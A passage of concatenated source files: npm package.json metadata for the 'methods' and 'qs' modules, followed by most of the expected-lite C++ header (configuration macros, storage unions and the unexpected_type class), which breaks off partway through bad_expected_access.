"methods"
],
"author": {
"name": "TJ Holowaychuk"
},
"license": "MIT",
"repository": {
"type": "git",
"url": "git://github.com/visionmedia/node-methods.git"
},
"devDependencies": {
"mocha": "1.17.x"
},
"readme": "\n# Methods\n\n HTTP verbs that node core's parser supports.\n",
"readmeFilename": "Readme.md",
"bugs": {
"url": "https://github.com/visionmedia/node-methods/issues"
},
"homepage": "https://github.com/visionmedia/node-methods",
"_id": "[email protected]",
"_from": "[email protected]"
}
{
"name": "qs",
"description": "A querystring parser that supports nesting and arrays, with a depth limit",
"homepage": "https://github.com/ljharb/qs",
"version": "6.3.1",
"repository": {
"type": "git",
"url": "git+https://github.com/ljharb/qs.git"
},
"main": "lib/index.js",
"contributors": [
{
"name": "Jordan Harband",
"email": "[email protected]",
"url": "http://ljharb.codes"
}
],
"keywords": [
"querystring",
"qs"
],
"engines": {
"node": ">=0.6"
},
"dependencies": {},
"devDependencies": {
"@ljharb/eslint-config": "^11.0.0",
"browserify": "^14.1.0",
"covert": "^1.1.0",
"eslint": "^3.15.0",
"evalmd": "^0.0.17",
"iconv-lite": "^0.4.15",
"mkdirp": "^0.5.1",
"parallelshell": "^2.0.0",
"qs-iconv": "^1.0.4",
"safe-publish-latest": "^1.1.1",
"tape": "^4.6.3"
},
"scripts": {
"prepublish": "safe-publish-latest && npm run dist",
"pretest": "npm run --silent readme && npm run --silent lint",
"test": "npm run --silent coverage",
"tests-only": "node test",
"readme": "evalmd README.md",
"lint": "eslint lib/*.js test/*.js",
"coverage": "covert test",
"dist": "mkdirp dist && browserify --standalone Qs lib/index.js > dist/qs.js"
},
"license": "BSD-3-Clause",
"gitHead": "153ce84948845330d90178cbad982fc7371df538",
"bugs": {
"url": "https://github.com/ljharb/qs/issues"
},
"_id": "[email protected]",
"_shasum": "918c0b3bcd36679772baf135b1acb4c1651ed79d",
"_from": "[email protected]",
"_npmVersion": "4.1.2",
"_nodeVersion": "7.5.0",
"_npmUser": {
"name": "ljharb",
"email": "[email protected]"
},
"dist": {
"shasum": "918c0b3bcd36679772baf135b1acb4c1651ed79d",
"tarball": "https://registry.npmjs.org/qs/-/qs-6.3.1.tgz"
},
"maintainers": [
{
"name": "hueniverse",
"email": "[email protected]"
},
{
"name": "ljharb",
"email": "[email protected]"
},
{
"name": "nlf",
"email": "[email protected]"
}
],
"_npmOperationalInternal": {
"host": "packages-12-west.internal.npmjs.com",
"tmp": "tmp/qs-6.3.1.tgz_1487220058786_0.35462796757929027"
},
"directories": {},
"_resolved": "https://registry.npmjs.org/qs/-/qs-6.3.1.tgz"
}
// This version targets C++11 and later.
//
// Copyright (C) 2016-2018 Martin Moene.
//
// Distributed under the Boost Software License, Version 1.0.
// (See accompanying file LICENSE.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
//
// expected lite is based on:
// A proposal to add a utility class to represent expected monad
// by Vicente J. Botet Escriba and Pierre Talbot. http://wg21.link/p0323
#ifndef NONSTD_EXPECTED_LITE_HPP
#define NONSTD_EXPECTED_LITE_HPP
#define expected_lite_MAJOR 0
#define expected_lite_MINOR 4
#define expected_lite_PATCH 0
#define expected_lite_VERSION expected_STRINGIFY(expected_lite_MAJOR) "." expected_STRINGIFY(expected_lite_MINOR) "." expected_STRINGIFY(expected_lite_PATCH)
#define expected_STRINGIFY( x ) expected_STRINGIFY_( x )
#define expected_STRINGIFY_( x ) #x
// expected-lite configuration:
#define nsel_EXPECTED_DEFAULT 0
#define nsel_EXPECTED_NONSTD 1
#define nsel_EXPECTED_STD 2
#if !defined( nsel_CONFIG_SELECT_EXPECTED )
# define nsel_CONFIG_SELECT_EXPECTED ( nsel_HAVE_STD_EXPECTED ? nsel_EXPECTED_STD : nsel_EXPECTED_NONSTD )
#endif
// Proposal revisions:
//
// DXXXXR0: --
// N4015 : -2 (2014-05-26)
// N4109 : -1 (2014-06-29)
// P0323R0: 0 (2016-05-28)
// P0323R1: 1 (2016-10-12)
// -------:
// P0323R2: 2 (2017-06-15)
// P0323R3: 3 (2017-10-15)
// P0323R4: 4 (2017-11-26)
// P0323R5: 5 (2018-02-08)
// P0323R6: 6 (2018-04-02)
// P0323R7: 7 (2018-06-22) *
//
// expected-lite uses 2 and higher
#ifndef nsel_P0323R
# define nsel_P0323R 7
#endif
// Control presence of exception handling (try and auto discover):
#ifndef nsel_CONFIG_NO_EXCEPTIONS
# if defined(__cpp_exceptions) || defined(__EXCEPTIONS) || defined(_CPPUNWIND)
# define nsel_CONFIG_NO_EXCEPTIONS 0
# else
# define nsel_CONFIG_NO_EXCEPTIONS 1
# endif
#endif
// C++ language version detection (C++20 is speculative):
// Note: VC14.0/1900 (VS2015) lacks too much from C++14.
#ifndef nsel_CPLUSPLUS
# if defined(_MSVC_LANG ) && !defined(__clang__)
# define nsel_CPLUSPLUS (_MSC_VER == 1900 ? 201103L : _MSVC_LANG )
# else
# define nsel_CPLUSPLUS __cplusplus
# endif
#endif
#define nsel_CPP98_OR_GREATER ( nsel_CPLUSPLUS >= 199711L )
#define nsel_CPP11_OR_GREATER ( nsel_CPLUSPLUS >= 201103L )
#define nsel_CPP14_OR_GREATER ( nsel_CPLUSPLUS >= 201402L )
#define nsel_CPP17_OR_GREATER ( nsel_CPLUSPLUS >= 201703L )
#define nsel_CPP20_OR_GREATER ( nsel_CPLUSPLUS >= 202000L )
// Use C++20 std::expected if available and requested:
#if nsel_CPP20_OR_GREATER && defined(__has_include )
# if __has_include( <expected> )
# define nsel_HAVE_STD_EXPECTED 1
# else
# define nsel_HAVE_STD_EXPECTED 0
# endif
#else
# define nsel_HAVE_STD_EXPECTED 0
#endif
#define nsel_USES_STD_EXPECTED ( (nsel_CONFIG_SELECT_EXPECTED == nsel_EXPECTED_STD) || ((nsel_CONFIG_SELECT_EXPECTED == nsel_EXPECTED_DEFAULT) && nsel_HAVE_STD_EXPECTED) )
//
// in_place: code duplicated in any-lite, expected-lite, optional-lite, value-ptr-lite, variant-lite:
//
#ifndef nonstd_lite_HAVE_IN_PLACE_TYPES
#define nonstd_lite_HAVE_IN_PLACE_TYPES 1
// C++17 std::in_place in <utility>:
#if nsel_CPP17_OR_GREATER
#include <utility>
namespace nonstd {
using std::in_place;
using std::in_place_type;
using std::in_place_index;
using std::in_place_t;
using std::in_place_type_t;
using std::in_place_index_t;
#define nonstd_lite_in_place_t( T) std::in_place_t
#define nonstd_lite_in_place_type_t( T) std::in_place_type_t<T>
#define nonstd_lite_in_place_index_t(K) std::in_place_index_t<K>
#define nonstd_lite_in_place( T) std::in_place_t{}
#define nonstd_lite_in_place_type( T) std::in_place_type_t<T>{}
#define nonstd_lite_in_place_index(K) std::in_place_index_t<K>{}
} // namespace nonstd
#else // nsel_CPP17_OR_GREATER
#include <cstddef>
namespace nonstd {
namespace detail {
template< class T >
struct in_place_type_tag {};
template< std::size_t K >
struct in_place_index_tag {};
} // namespace detail
struct in_place_t {};
template< class T >
inline in_place_t in_place( detail::in_place_type_tag<T> = detail::in_place_type_tag<T>() )
{
return in_place_t();
}
template< std::size_t K >
inline in_place_t in_place( detail::in_place_index_tag<K> = detail::in_place_index_tag<K>() )
{
return in_place_t();
}
template< class T >
inline in_place_t in_place_type( detail::in_place_type_tag<T> = detail::in_place_type_tag<T>() )
{
return in_place_t();
}
template< std::size_t K >
inline in_place_t in_place_index( detail::in_place_index_tag<K> = detail::in_place_index_tag<K>() )
{
return in_place_t();
}
// mimic templated typedef:
#define nonstd_lite_in_place_t( T) nonstd::in_place_t(&)( nonstd::detail::in_place_type_tag<T> )
#define nonstd_lite_in_place_type_t( T) nonstd::in_place_t(&)( nonstd::detail::in_place_type_tag<T> )
#define nonstd_lite_in_place_index_t(K) nonstd::in_place_t(&)( nonstd::detail::in_place_index_tag<K> )
#define nonstd_lite_in_place( T) nonstd::in_place_type<T>
#define nonstd_lite_in_place_type( T) nonstd::in_place_type<T>
#define nonstd_lite_in_place_index(K) nonstd::in_place_index<K>
} // namespace nonstd
#endif // nsel_CPP17_OR_GREATER
#endif // nonstd_lite_HAVE_IN_PLACE_TYPES
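// Illustrative use (a sketch, not part of the header): the in_place machinery
// above lets callers construct an expected's value or error in place on any
// supported standard level, e.g.:
//
//   nonstd::expected<std::string, int> ex( nonstd_lite_in_place(std::string), 3u, '!' );
//   // ex.value() == "!!!"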
//
// Using std::expected:
//
#if nsel_USES_STD_EXPECTED
#include <expected>
namespace nonstd {
using std::expected;
// ...
}
#else // nsel_USES_STD_EXPECTED
#include <cassert>
#include <exception>
#include <functional>
#include <initializer_list>
#include <memory>
#include <new>
#include <system_error>
#include <type_traits>
#include <utility>
// additional includes:
#if nsel_CONFIG_NO_EXCEPTIONS
// already included: <cassert>
#else
# include <stdexcept>
#endif
// C++ feature usage:
#if nsel_CPP11_OR_GREATER
# define nsel_constexpr constexpr
#else
# define nsel_constexpr /*constexpr*/
#endif
#if nsel_CPP14_OR_GREATER
# define nsel_constexpr14 constexpr
#else
# define nsel_constexpr14 /*constexpr*/
#endif
#if nsel_CPP17_OR_GREATER
# define nsel_inline17 inline
#else
# define nsel_inline17 /*inline*/
#endif
// Compiler versions:
//
// MSVC++ 6.0 _MSC_VER == 1200 nsel_COMPILER_MSVC_VERSION == 60 (Visual Studio 6.0)
// MSVC++ 7.0 _MSC_VER == 1300 nsel_COMPILER_MSVC_VERSION == 70 (Visual Studio .NET 2002)
// MSVC++ 7.1 _MSC_VER == 1310 nsel_COMPILER_MSVC_VERSION == 71 (Visual Studio .NET 2003)
// MSVC++ 8.0 _MSC_VER == 1400 nsel_COMPILER_MSVC_VERSION == 80 (Visual Studio 2005)
// MSVC++ 9.0 _MSC_VER == 1500 nsel_COMPILER_MSVC_VERSION == 90 (Visual Studio 2008)
// MSVC++ 10.0 _MSC_VER == 1600 nsel_COMPILER_MSVC_VERSION == 100 (Visual Studio 2010)
// MSVC++ 11.0 _MSC_VER == 1700 nsel_COMPILER_MSVC_VERSION == 110 (Visual Studio 2012)
// MSVC++ 12.0 _MSC_VER == 1800 nsel_COMPILER_MSVC_VERSION == 120 (Visual Studio 2013)
// MSVC++ 14.0 _MSC_VER == 1900 nsel_COMPILER_MSVC_VERSION == 140 (Visual Studio 2015)
// MSVC++ 14.1 _MSC_VER >= 1910 nsel_COMPILER_MSVC_VERSION == 141 (Visual Studio 2017)
// MSVC++ 14.2 _MSC_VER >= 1920 nsel_COMPILER_MSVC_VERSION == 142 (Visual Studio 2019)
#if defined(_MSC_VER) && !defined(__clang__)
# define nsel_COMPILER_MSVC_VER (_MSC_VER )
# define nsel_COMPILER_MSVC_VERSION (_MSC_VER / 10 - 10 * ( 5 + (_MSC_VER < 1900)) )
#else
# define nsel_COMPILER_MSVC_VER 0
# define nsel_COMPILER_MSVC_VERSION 0
#endif
#define nsel_COMPILER_VERSION( major, minor, patch ) ( 10 * ( 10 * (major) + (minor) ) + (patch) )
#if defined(__clang__)
# define nsel_COMPILER_CLANG_VERSION nsel_COMPILER_VERSION(__clang_major__, __clang_minor__, __clang_patchlevel__)
#else
# define nsel_COMPILER_CLANG_VERSION 0
#endif
#if defined(__GNUC__) && !defined(__clang__)
# define nsel_COMPILER_GNUC_VERSION nsel_COMPILER_VERSION(__GNUC__, __GNUC_MINOR__, __GNUC_PATCHLEVEL__)
#else
# define nsel_COMPILER_GNUC_VERSION 0
#endif
// half-open range [lo..hi):
//#define nsel_BETWEEN( v, lo, hi ) ( (lo) <= (v) && (v) < (hi) )
// Method enabling
#define nsel_REQUIRES_0(...) \
template< bool B = (__VA_ARGS__), typename std::enable_if<B, int>::type = 0 >
#define nsel_REQUIRES_T(...) \
, typename std::enable_if< (__VA_ARGS__), int >::type = 0
#define nsel_REQUIRES_R(R, ...) \
typename std::enable_if< (__VA_ARGS__), R>::type
#define nsel_REQUIRES_A(...) \
, typename std::enable_if< (__VA_ARGS__), void*>::type = nullptr
// Presence of language and library features:
#ifdef _HAS_CPP0X
# define nsel_HAS_CPP0X _HAS_CPP0X
#else
# define nsel_HAS_CPP0X 0
#endif
//#define nsel_CPP11_140 (nsel_CPP11_OR_GREATER || nsel_COMPILER_MSVC_VER >= 1900)
// Clang, GNUC, MSVC warning suppression macros:
#ifdef __clang__
# pragma clang diagnostic push
#elif defined __GNUC__
# pragma GCC diagnostic push
#endif // __clang__
#if nsel_COMPILER_MSVC_VERSION >= 140
# pragma warning( push )
# define nsel_DISABLE_MSVC_WARNINGS(codes) __pragma( warning(disable: codes) )
#else
# define nsel_DISABLE_MSVC_WARNINGS(codes)
#endif
#ifdef __clang__
# define nsel_RESTORE_WARNINGS() _Pragma("clang diagnostic pop")
#elif defined __GNUC__
# define nsel_RESTORE_WARNINGS() _Pragma("GCC diagnostic pop")
#elif nsel_COMPILER_MSVC_VERSION >= 140
# define nsel_RESTORE_WARNINGS() __pragma( warning( pop ) )
#else
# define nsel_RESTORE_WARNINGS()
#endif
// Suppress the following MSVC (GSL) warnings:
// - C26409: Avoid calling new and delete explicitly, use std::make_unique<T> instead (r.11)
nsel_DISABLE_MSVC_WARNINGS( 26409 )
//
// expected:
//
namespace nonstd { namespace expected_lite {
// type traits C++17:
namespace std17 {
#if nsel_CPP17_OR_GREATER
using std::conjunction;
using std::is_swappable;
using std::is_nothrow_swappable;
#else // nsel_CPP17_OR_GREATER
namespace detail {
using std::swap;
struct is_swappable
{
template< typename T, typename = decltype( swap( std::declval<T&>(), std::declval<T&>() ) ) >
static std::true_type test( int /* unused */);
template< typename >
static std::false_type test(...);
};
struct is_nothrow_swappable
{
// wrap noexcept(expr) in separate function as work-around for VC140 (VS2015):
template< typename T >
static constexpr bool satisfies()
{
return noexcept( swap( std::declval<T&>(), std::declval<T&>() ) );
}
template< typename T >
static auto test( int ) -> std::integral_constant<bool, satisfies<T>()>{}
template< typename >
static auto test(...) -> std::false_type;
};
} // namespace detail
// is [nothrow] swappable:
template< typename T >
struct is_swappable : decltype( detail::is_swappable::test<T>(0) ){};
template< typename T >
struct is_nothrow_swappable : decltype( detail::is_nothrow_swappable::test<T>(0) ){};
// conjunction:
template< typename... > struct conjunction : std::true_type{};
template< typename B1 > struct conjunction<B1> : B1{};
template< typename B1, typename... Bn >
struct conjunction<B1, Bn...> : std::conditional<bool(B1::value), conjunction<Bn...>, B1>::type{};
#endif // nsel_CPP17_OR_GREATER
} // namespace std17
// type traits C++20:
namespace std20 {
#if nsel_CPP20_OR_GREATER
using std::remove_cvref;
#else
template< typename T >
struct remove_cvref
{
typedef typename std::remove_cv< typename std::remove_reference<T>::type >::type type;
};
#endif
} // namespace std20
// forward declaration:
template< typename T, typename E >
class expected;
namespace detail {
/// discriminated union to hold value or 'error'.
template< typename T, typename E >
class storage_t_impl
{
template< typename, typename > friend class nonstd::expected_lite::expected;
public:
using value_type = T;
using error_type = E;
// no-op construction
storage_t_impl() {}
~storage_t_impl() {}
explicit storage_t_impl( bool has_value )
: m_has_value( has_value )
{}
void construct_value( value_type const & e )
{
new( &m_value ) value_type( e );
}
void construct_value( value_type && e )
{
new( &m_value ) value_type( std::move( e ) );
}
template< class... Args >
void emplace_value( Args&&... args )
{
new( &m_value ) value_type( std::forward<Args>(args)...);
}
template< class U, class... Args >
void emplace_value( std::initializer_list<U> il, Args&&... args )
{
new( &m_value ) value_type( il, std::forward<Args>(args)... );
}
void destruct_value()
{
m_value.~value_type();
}
void construct_error( error_type const & e )
{
new( &m_error ) error_type( e );
}
void construct_error( error_type && e )
{
new( &m_error ) error_type( std::move( e ) );
}
template< class... Args >
void emplace_error( Args&&... args )
{
new( &m_error ) error_type( std::forward<Args>(args)...);
}
template< class U, class... Args >
void emplace_error( std::initializer_list<U> il, Args&&... args )
{
new( &m_error ) error_type( il, std::forward<Args>(args)... );
}
void destruct_error()
{
m_error.~error_type();
}
constexpr value_type const & value() const &
{
return m_value;
}
value_type & value() &
{
return m_value;
}
constexpr value_type const && value() const &&
{
return std::move( m_value );
}
nsel_constexpr14 value_type && value() &&
{
return std::move( m_value );
}
value_type const * value_ptr() const
{
return &m_value;
}
value_type * value_ptr()
{
return &m_value;
}
error_type const & error() const &
{
return m_error;
}
error_type & error() &
{
return m_error;
}
constexpr error_type const && error() const &&
{
return std::move( m_error );
}
nsel_constexpr14 error_type && error() &&
{
return std::move( m_error );
}
bool has_value() const
{
return m_has_value;
}
void set_has_value( bool v )
{
m_has_value = v;
}
private:
union
{
value_type m_value;
error_type m_error;
};
bool m_has_value = false;
};
/// discriminated union to hold only 'error'.
template< typename E >
struct storage_t_impl<void, E>
{
template< typename, typename > friend class nonstd::expected_lite::expected;
public:
using value_type = void;
using error_type = E;
// no-op construction
storage_t_impl() {}
~storage_t_impl() {}
explicit storage_t_impl( bool has_value )
: m_has_value( has_value )
{}
void construct_error( error_type const & e )
{
new( &m_error ) error_type( e );
}
void construct_error( error_type && e )
{
new( &m_error ) error_type( std::move( e ) );
}
template< class... Args >
void emplace_error( Args&&... args )
{
new( &m_error ) error_type( std::forward<Args>(args)...);
}
template< class U, class... Args >
void emplace_error( std::initializer_list<U> il, Args&&... args )
{
new( &m_error ) error_type( il, std::forward<Args>(args)... );
}
void destruct_error()
{
m_error.~error_type();
}
error_type const & error() const &
{
return m_error;
}
error_type & error() &
{
return m_error;
}
constexpr error_type const && error() const &&
{
return std::move( m_error );
}
nsel_constexpr14 error_type && error() &&
{
return std::move( m_error );
}
bool has_value() const
{
return m_has_value;
}
void set_has_value( bool v )
{
m_has_value = v;
}
private:
union
{
char m_dummy;
error_type m_error;
};
bool m_has_value = false;
};
template< typename T, typename E, bool isConstructable, bool isMoveable >
class storage_t
{
public:
storage_t() = default;
~storage_t() = default;
explicit storage_t( bool has_value )
: storage_t_impl<T, E>( has_value )
{}
storage_t( storage_t const & other ) = delete;
storage_t( storage_t && other ) = delete;
};
template< typename T, typename E >
class storage_t<T, E, true, true> : public storage_t_impl<T, E>
{
public:
storage_t() = default;
~storage_t() = default;
explicit storage_t( bool has_value )
: storage_t_impl<T, E>( has_value )
{}
storage_t( storage_t const & other )
: storage_t_impl<T, E>( other.has_value() )
{
if ( this->has_value() ) this->construct_value( other.value() );
else this->construct_error( other.error() );
}
storage_t(storage_t && other )
: storage_t_impl<T, E>( other.has_value() )
{
if ( this->has_value() ) this->construct_value( std::move( other.value() ) );
else this->construct_error( std::move( other.error() ) );
}
};
template< typename E >
class storage_t<void, E, true, true> : public storage_t_impl<void, E>
{
public:
storage_t() = default;
~storage_t() = default;
explicit storage_t( bool has_value )
: storage_t_impl<void, E>( has_value )
{}
storage_t( storage_t const & other )
: storage_t_impl<void, E>( other.has_value() )
{
if ( this->has_value() ) ;
else this->construct_error( other.error() );
}
storage_t(storage_t && other )
: storage_t_impl<void, E>( other.has_value() )
{
if ( this->has_value() ) ;
else this->construct_error( std::move( other.error() ) );
}
};
template< typename T, typename E >
class storage_t<T, E, true, false> : public storage_t_impl<T, E>
{
public:
storage_t() = default;
~storage_t() = default;
explicit storage_t( bool has_value )
: storage_t_impl<T, E>( has_value )
{}
storage_t( storage_t const & other )
: storage_t_impl<T, E>(other.has_value())
{
if ( this->has_value() ) this->construct_value( other.value() );
else this->construct_error( other.error() );
}
storage_t( storage_t && other ) = delete;
};
template< typename E >
class storage_t<void, E, true, false> : public storage_t_impl<void, E>
{
public:
storage_t() = default;
~storage_t() = default;
explicit storage_t( bool has_value )
: storage_t_impl<void, E>( has_value )
{}
storage_t( storage_t const & other )
: storage_t_impl<void, E>(other.has_value())
{
if ( this->has_value() ) ;
else this->construct_error( other.error() );
}
storage_t( storage_t && other ) = delete;
};
template< typename T, typename E >
class storage_t<T, E, false, true> : public storage_t_impl<T, E>
{
public:
storage_t() = default;
~storage_t() = default;
explicit storage_t( bool has_value )
: storage_t_impl<T, E>( has_value )
{}
storage_t( storage_t const & other ) = delete;
storage_t( storage_t && other )
: storage_t_impl<T, E>( other.has_value() )
{
if ( this->has_value() ) this->construct_value( std::move( other.value() ) );
else this->construct_error( std::move( other.error() ) );
}
};
template< typename E >
class storage_t<void, E, false, true> : public storage_t_impl<void, E>
{
public:
storage_t() = default;
~storage_t() = default;
explicit storage_t( bool has_value )
: storage_t_impl<void, E>( has_value )
{}
storage_t( storage_t const & other ) = delete;
storage_t( storage_t && other )
: storage_t_impl<void, E>( other.has_value() )
{
if ( this->has_value() ) ;
else this->construct_error( std::move( other.error() ) );
}
};
} // namespace detail
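// Note: the storage_t<T, E, isConstructable, isMoveable> specializations above
// enable or delete the copy and move constructors of the storage according to
// the copy/move constructibility of T and E, so that expected<T, E> can
// default its own special member functions and still reject copying or moving
// payload types that do not support it.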
/// x.x.5 Unexpected object type; unexpected_type; C++17 and later can also use aliased type unexpected.
#if nsel_P0323R <= 2
template< typename E = std::exception_ptr >
class unexpected_type
#else
template< typename E >
class unexpected_type
#endif // nsel_P0323R
{
public:
using error_type = E;
// x.x.5.2.1 Constructors
// unexpected_type() = delete;
constexpr unexpected_type( unexpected_type const & ) = default;
constexpr unexpected_type( unexpected_type && ) = default;
template< typename... Args
nsel_REQUIRES_T(
std::is_constructible<E, Args&&...>::value
)
>
constexpr explicit unexpected_type( nonstd_lite_in_place_t(E), Args &&... args )
: m_error( std::forward<Args>( args )...)
{}
template< typename U, typename... Args
nsel_REQUIRES_T(
std::is_constructible<E, std::initializer_list<U>, Args&&...>::value
)
>
constexpr explicit unexpected_type( nonstd_lite_in_place_t(E), std::initializer_list<U> il, Args &&... args )
: m_error( il, std::forward<Args>( args )...)
{}
template< typename E2
nsel_REQUIRES_T(
std::is_constructible<E,E2>::value
&& !std::is_same< typename std20::remove_cvref<E2>::type, nonstd_lite_in_place_t(E2) >::value
&& !std::is_same< typename std20::remove_cvref<E2>::type, unexpected_type >::value
)
>
constexpr explicit unexpected_type( E2 && error )
: m_error( std::forward<E2>( error ) )
{}
template< typename E2
nsel_REQUIRES_T(
std::is_constructible< E, E2>::value
&& !std::is_constructible<E, unexpected_type<E2> & >::value
&& !std::is_constructible<E, unexpected_type<E2> >::value
&& !std::is_constructible<E, unexpected_type<E2> const & >::value
&& !std::is_constructible<E, unexpected_type<E2> const >::value
&& !std::is_convertible< unexpected_type<E2> &, E>::value
&& !std::is_convertible< unexpected_type<E2> , E>::value
&& !std::is_convertible< unexpected_type<E2> const &, E>::value
&& !std::is_convertible< unexpected_type<E2> const , E>::value
&& !std::is_convertible< E2 const &, E>::value /*=> explicit */
)
>
constexpr explicit unexpected_type( unexpected_type<E2> const & error )
: m_error( E{ error.value() } )
{}
template< typename E2
nsel_REQUIRES_T(
std::is_constructible< E, E2>::value
&& !std::is_constructible<E, unexpected_type<E2> & >::value
&& !std::is_constructible<E, unexpected_type<E2> >::value
&& !std::is_constructible<E, unexpected_type<E2> const & >::value
&& !std::is_constructible<E, unexpected_type<E2> const >::value
&& !std::is_convertible< unexpected_type<E2> &, E>::value
&& !std::is_convertible< unexpected_type<E2> , E>::value
&& !std::is_convertible< unexpected_type<E2> const &, E>::value
&& !std::is_convertible< unexpected_type<E2> const , E>::value
&& std::is_convertible< E2 const &, E>::value /*=> explicit */
)
>
constexpr /*non-explicit*/ unexpected_type( unexpected_type<E2> const & error )
: m_error( error.value() )
{}
template< typename E2
nsel_REQUIRES_T(
std::is_constructible< E, E2>::value
&& !std::is_constructible<E, unexpected_type<E2> & >::value
&& !std::is_constructible<E, unexpected_type<E2> >::value
&& !std::is_constructible<E, unexpected_type<E2> const & >::value
&& !std::is_constructible<E, unexpected_type<E2> const >::value
&& !std::is_convertible< unexpected_type<E2> &, E>::value
&& !std::is_convertible< unexpected_type<E2> , E>::value
&& !std::is_convertible< unexpected_type<E2> const &, E>::value
&& !std::is_convertible< unexpected_type<E2> const , E>::value
&& !std::is_convertible< E2 const &, E>::value /*=> explicit */
)
>
constexpr explicit unexpected_type( unexpected_type<E2> && error )
: m_error( E{ std::move( error.value() ) } )
{}
template< typename E2
nsel_REQUIRES_T(
std::is_constructible< E, E2>::value
&& !std::is_constructible<E, unexpected_type<E2> & >::value
&& !std::is_constructible<E, unexpected_type<E2> >::value
&& !std::is_constructible<E, unexpected_type<E2> const & >::value
&& !std::is_constructible<E, unexpected_type<E2> const >::value
&& !std::is_convertible< unexpected_type<E2> &, E>::value
&& !std::is_convertible< unexpected_type<E2> , E>::value
&& !std::is_convertible< unexpected_type<E2> const &, E>::value
&& !std::is_convertible< unexpected_type<E2> const , E>::value
&& std::is_convertible< E2 const &, E>::value /*=> non-explicit */
)
>
constexpr /*non-explicit*/ unexpected_type( unexpected_type<E2> && error )
: m_error( std::move( error.value() ) )
{}
// x.x.5.2.2 Assignment
nsel_constexpr14 unexpected_type& operator=( unexpected_type const & ) = default;
nsel_constexpr14 unexpected_type& operator=( unexpected_type && ) = default;
template< typename E2 = E >
nsel_constexpr14 unexpected_type & operator=( unexpected_type<E2> const & other )
{
unexpected_type{ other.value() }.swap( *this );
return *this;
}
template< typename E2 = E >
nsel_constexpr14 unexpected_type & operator=( unexpected_type<E2> && other )
{
unexpected_type{ std::move( other.value() ) }.swap( *this );
return *this;
}
// x.x.5.2.3 Observers
nsel_constexpr14 E & value() & noexcept
{
return m_error;
}
constexpr E const & value() const & noexcept
{
return m_error;
}
#if !nsel_COMPILER_GNUC_VERSION || nsel_COMPILER_GNUC_VERSION >= 490
nsel_constexpr14 E && value() && noexcept
{
return std::move( m_error );
}
constexpr E const && value() const && noexcept
{
return std::move( m_error );
}
#endif
// x.x.5.2.4 Swap
nsel_REQUIRES_R( void,
std17::is_swappable<E>::value
)
swap( unexpected_type & other ) noexcept (
std17::is_nothrow_swappable<E>::value
)
{
using std::swap;
swap( m_error, other.m_error );
}
// TODO: ??? unexpected_type: in-class friend operator==, !=
private:
error_type m_error;
};
#if nsel_CPP17_OR_GREATER
/// template deduction guide:
template< typename E >
unexpected_type( E ) -> unexpected_type< E >;
#endif
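// With the C++17 deduction guide, the error type is deduced at the call site
// (illustrative):
//
//   auto u = nonstd::unexpected_type( 42 );   // deduces unexpected_type<int>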
/// class unexpected_type, std::exception_ptr specialization (P0323R2)
#if !nsel_CONFIG_NO_EXCEPTIONS
#if nsel_P0323R <= 2
// TODO: Should expected be specialized for particular E types such as exception_ptr and how?
// See p0323r7 2.1. Ergonomics, http://wg21.link/p0323
template<>
class unexpected_type< std::exception_ptr >
{
public:
using error_type = std::exception_ptr;
unexpected_type() = delete;
~unexpected_type(){}
explicit unexpected_type( std::exception_ptr const & error )
: m_error( error )
{}
explicit unexpected_type(std::exception_ptr && error )
: m_error( std::move( error ) )
{}
template< typename E >
explicit unexpected_type( E error )
: m_error( std::make_exception_ptr( error ) )
{}
std::exception_ptr const & value() const
{
return m_error;
}
std::exception_ptr & value()
{
return m_error;
}
private:
std::exception_ptr m_error;
};
#endif // nsel_P0323R
#endif // !nsel_CONFIG_NO_EXCEPTIONS
/// x.x.4, Unexpected equality operators
template< typename E1, typename E2 >
constexpr bool operator==( unexpected_type<E1> const & x, unexpected_type<E2> const & y )
{
return x.value() == y.value();
}
template< typename E1, typename E2 >
constexpr bool operator!=( unexpected_type<E1> const & x, unexpected_type<E2> const & y )
{
return ! ( x == y );
}
#if nsel_P0323R <= 2
template< typename E >
constexpr bool operator<( unexpected_type<E> const & x, unexpected_type<E> const & y )
{
return x.value() < y.value();
}
template< typename E >
constexpr bool operator>( unexpected_type<E> const & x, unexpected_type<E> const & y )
{
return ( y < x );
}
template< typename E >
constexpr bool operator<=( unexpected_type<E> const & x, unexpected_type<E> const & y )
{
return ! ( y < x );
}
template< typename E >
constexpr bool operator>=( unexpected_type<E> const & x, unexpected_type<E> const & y )
{
return ! ( x < y );
}
#endif // nsel_P0323R
/// x.x.5 Specialized algorithms
template< typename E
nsel_REQUIRES_T(
std17::is_swappable<E>::value
)
>
void swap( unexpected_type<E> & x, unexpected_type<E> & y) noexcept ( noexcept ( x.swap(y) ) )
{
x.swap( y );
}
#if nsel_P0323R <= 2
// unexpected: relational operators for std::exception_ptr:
inline constexpr bool operator<( unexpected_type<std::exception_ptr> const & /*x*/, unexpected_type<std::exception_ptr> const & /*y*/ )
{
return false;
}
inline constexpr bool operator>( unexpected_type<std::exception_ptr> const & /*x*/, unexpected_type<std::exception_ptr> const & /*y*/ )
{
return false;
}
inline constexpr bool operator<=( unexpected_type<std::exception_ptr> const & x, unexpected_type<std::exception_ptr> const & y )
{
return ( x == y );
}
inline constexpr bool operator>=( unexpected_type<std::exception_ptr> const & x, unexpected_type<std::exception_ptr> const & y )
{
return ( x == y );
}
#endif // nsel_P0323R
// unexpected: traits
#if nsel_P0323R <= 3
template< typename E>
struct is_unexpected : std::false_type {};
template< typename E>
struct is_unexpected< unexpected_type<E> > : std::true_type {};
#endif // nsel_P0323R
// unexpected: factory
// keep make_unexpected() removed in p0323r2 for pre-C++17:
template< typename E>
nsel_constexpr14 auto
make_unexpected( E && value ) -> unexpected_type< typename std::decay<E>::type >
{
return unexpected_type< typename std::decay<E>::type >( std::forward<E>(value) );
}
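// make_unexpected() decays its argument type; for example (a sketch):
//
//   auto u = nonstd::make_unexpected( "oops" );  // unexpected_type<char const *>
//   nonstd::expected<int, std::string> ex = nonstd::make_unexpected( std::string("oops") );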
#if nsel_P0323R <= 3
/*nsel_constexpr14*/ auto inline
make_unexpected_from_current_exception() -> unexpected_type< std::exception_ptr >
{
return unexpected_type< std::exception_ptr >( std::current_exception() );
}
#endif // nsel_P0323R
/// x.x.6, x.x.7 expected access error
template< typename E >
class bad_expected_access;
/// x.x.7 bad_expected_access<void>: expected access error
template <>
class bad_expected_access< void > : public std::exception
{
public:
explicit bad_expected_access()
: std::exception()
{}
};
/// x.x.6 bad_expected_access: expected access error
#if !nsel_CONFIG_NO_EXCEPTIONS
template< typename E >
class bad_expected_access : public bad_expected_access< void >
{
public:
using error_type = E;
explicit bad_expected_access( error_type error )
: m_error( error )
